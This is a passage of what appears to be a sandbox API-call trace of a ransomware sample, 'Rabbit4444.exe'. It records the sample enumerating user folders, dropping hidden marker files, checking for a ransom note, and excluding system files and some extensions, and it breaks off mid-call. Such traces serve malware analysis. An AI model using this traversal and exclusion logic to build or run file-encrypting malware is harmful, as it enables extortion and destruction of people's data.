lpString1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" [0048.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10cd98 | out: hHeap=0xe0000) returned 1 [0048.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0048.906] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" [0048.906] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\" [0048.906] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\.BFC0E91B00AE8A0620D3" [0048.906] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.907] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.910] FlushFileBuffers (hFile=0x27c) returned 1 [0048.911] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.911] CloseHandle (hObject=0x27c) returned 1 [0048.912] lstrlenW (lpString="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned 36 [0048.912] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.912] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe67a20dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0048.912] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.912] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.912] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.912] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.912] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe67a20dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.912] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.912] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.912] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.912] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.912] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.912] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe67a20dd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe67a20dd, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe67a20dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.912] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.912] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.912] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0048.912] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.912] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.912] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0048.912] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0048.912] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0048.913] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0048.913] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0048.913] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0048.913] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0048.913] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0048.913] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0048.913] lstrcpyW (in: lpString1=0x130eb82, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.913] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini", dwFileAttributes=0x2) returned 1 [0048.913] lstrlenW (lpString="desktop.ini") returned 11 [0048.913] lstrlenW (lpString="Rabbit4444") returned 10 [0048.913] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0048.913] lstrlenW (lpString=".dll") returned 4 [0048.913] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0048.913] lstrlenW (lpString=".lnk") returned 4 [0048.913] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0048.913] lstrlenW (lpString=".ini") returned 4 [0048.913] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0048.913] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0048.913] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0048.913] lstrcpyW (in: lpString1=0x130eb82, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.913] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.915] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.915] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.915] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.915] CloseHandle (hObject=0x278) returned 1 [0048.916] CloseHandle (hObject=0x27c) returned 1 [0048.916] GetCurrentThreadId () returned 0xd98 [0048.916] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0048.916] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\OneDrive", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\OneDrive") returned="C:\\Users\\FD1HVy\\OneDrive" [0048.916] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102810 | out: hHeap=0xe0000) returned 1 [0048.916] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0048.916] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\OneDrive" | out: lpString1="C:\\Users\\FD1HVy\\OneDrive") returned="C:\\Users\\FD1HVy\\OneDrive" [0048.916] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\OneDrive", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\OneDrive\\") returned="C:\\Users\\FD1HVy\\OneDrive\\" [0048.917] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\OneDrive\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\OneDrive\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\OneDrive\\.BFC0E91B00AE8A0620D3" [0048.917] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\OneDrive\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\onedrive\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.924] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.927] FlushFileBuffers (hFile=0x27c) returned 1 [0048.928] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\OneDrive\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.928] CloseHandle (hObject=0x27c) returned 1 [0048.929] lstrlenW (lpString="C:\\Users\\FD1HVy\\OneDrive") returned 24 [0048.929] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.929] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\OneDrive\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe67a20dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0048.929] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.929] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.929] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.929] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.929] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe67a20dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.929] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.929] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.929] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.929] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.929] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.929] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe67a20dd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe67a20dd, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe67c8373, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.929] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.929] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.929] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f0f0bc5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x93ef127a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0048.929] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.929] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.929] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0048.930] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0048.930] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0048.930] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0048.930] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0048.930] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0048.930] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0048.930] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0048.930] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0048.930] lstrcpyW (in: lpString1=0x130eb6a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.930] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\OneDrive\\desktop.ini", dwFileAttributes=0x2) returned 1 [0048.930] lstrlenW (lpString="desktop.ini") returned 11 [0048.930] lstrlenW (lpString="Rabbit4444") returned 10 [0048.930] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0048.930] lstrlenW (lpString=".dll") returned 4 [0048.930] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0048.930] lstrlenW (lpString=".lnk") returned 4 [0048.930] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0048.930] lstrlenW (lpString=".ini") returned 4 [0048.930] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0048.930] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f0f0bc5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x93ef127a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0048.930] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0048.930] lstrcpyW (in: lpString1=0x130eb6a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.930] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\OneDrive\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\onedrive\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.931] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.931] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.932] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.932] CloseHandle (hObject=0x278) returned 1 [0048.932] CloseHandle (hObject=0x27c) returned 1 [0048.932] GetCurrentThreadId () returned 0xd98 [0048.932] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6430 [0048.932] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Music", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0048.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf7530 | out: hHeap=0xe0000) returned 1 [0048.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6428 | out: hHeap=0xe0000) returned 1 [0048.933] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music" | out: lpString1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0048.933] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0048.933] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\.BFC0E91B00AE8A0620D3" [0048.933] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.933] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.936] FlushFileBuffers (hFile=0x27c) returned 1 [0048.937] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.937] CloseHandle (hObject=0x27c) returned 1 [0048.938] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music") returned 21 [0048.938] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.938] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd244396, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe67c8373, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0048.938] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.938] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.938] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.938] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.938] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd244396, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe67c8373, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.938] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.938] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.938] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.938] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.938] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.938] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe67c8373, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe67c8373, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe67ee50e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.938] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.938] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.938] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x534d57b0, ftCreationTime.dwHighDateTime=0x1d4d155, ftLastAccessTime.dwLowDateTime=0x6f888710, ftLastAccessTime.dwHighDateTime=0x1d4caca, ftLastWriteTime.dwLowDateTime=0x6f888710, ftLastWriteTime.dwHighDateTime=0x1d4caca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3yy255AddCwO6CDe", cAlternateFileName="3YY255~1")) returned 1 [0048.938] lstrcmpiW (lpString1="3yy255AddCwO6CDe", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.938] lstrcmpiW (lpString1="3yy255AddCwO6CDe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.938] lstrcmpiW (lpString1="3yy255AddCwO6CDe", lpString2="Rabbit4444.exe") returned -1 [0048.938] lstrcmpiW (lpString1="3yy255AddCwO6CDe", lpString2=".") returned 1 [0048.938] lstrcmpiW (lpString1="3yy255AddCwO6CDe", lpString2="..") returned 1 [0048.939] lstrcmpiW (lpString1="3yy255AddCwO6CDe", lpString2="windows") returned -1 [0048.939] lstrcmpiW (lpString1="3yy255AddCwO6CDe", lpString2="bootmgr") returned -1 [0048.939] lstrcmpiW (lpString1="3yy255AddCwO6CDe", lpString2="pagefile.sys") returned -1 [0048.939] lstrcmpiW (lpString1="3yy255AddCwO6CDe", lpString2="boot") returned -1 [0048.939] lstrcmpiW (lpString1="3yy255AddCwO6CDe", lpString2="ids.txt") returned -1 [0048.939] lstrcmpiW (lpString1="3yy255AddCwO6CDe", lpString2="NTUSER.DAT") returned -1 [0048.939] lstrcpyW (in: lpString1=0x130eb64, lpString2="3yy255AddCwO6CDe" | out: lpString1="3yy255AddCwO6CDe") returned="3yy255AddCwO6CDe" [0048.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0048.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4e) returned 0x10cd98 [0048.939] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6510 [0048.939] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f979960, ftCreationTime.dwHighDateTime=0x1d4c7a9, ftLastAccessTime.dwLowDateTime=0x59e37b70, ftLastAccessTime.dwHighDateTime=0x1d4d1c5, ftLastWriteTime.dwLowDateTime=0x59e37b70, ftLastWriteTime.dwHighDateTime=0x1d4d1c5, nFileSizeHigh=0x0, nFileSizeLow=0x503c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5oW38z-l_J.m4a", cAlternateFileName="5OW38Z~1.M4A")) returned 1 [0048.939] lstrcmpiW (lpString1="5oW38z-l_J.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.939] lstrcmpiW (lpString1="5oW38z-l_J.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.939] lstrcmpiW (lpString1="5oW38z-l_J.m4a", lpString2="Rabbit4444.exe") returned -1 [0048.939] lstrcmpiW (lpString1="5oW38z-l_J.m4a", lpString2=".") returned 1 [0048.939] lstrcmpiW (lpString1="5oW38z-l_J.m4a", lpString2="..") returned 1 [0048.939] lstrcmpiW (lpString1="5oW38z-l_J.m4a", lpString2="windows") returned -1 [0048.939] lstrcmpiW (lpString1="5oW38z-l_J.m4a", lpString2="bootmgr") returned -1 [0048.939] lstrcmpiW (lpString1="5oW38z-l_J.m4a", lpString2="pagefile.sys") returned -1 [0048.939] lstrcmpiW (lpString1="5oW38z-l_J.m4a", lpString2="boot") returned -1 [0048.939] lstrcmpiW (lpString1="5oW38z-l_J.m4a", lpString2="ids.txt") returned -1 [0048.939] lstrcmpiW (lpString1="5oW38z-l_J.m4a", lpString2="NTUSER.DAT") returned -1 [0048.939] lstrcpyW (in: lpString1=0x130eb64, lpString2="5oW38z-l_J.m4a" | out: lpString1="5oW38z-l_J.m4a") returned="5oW38z-l_J.m4a" [0048.939] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\5oW38z-l_J.m4a", dwFileAttributes=0x0) returned 1 [0048.939] lstrlenW (lpString="5oW38z-l_J.m4a") returned 14 [0048.939] lstrlenW (lpString="Rabbit4444") returned 10 [0048.939] lstrcmpiW 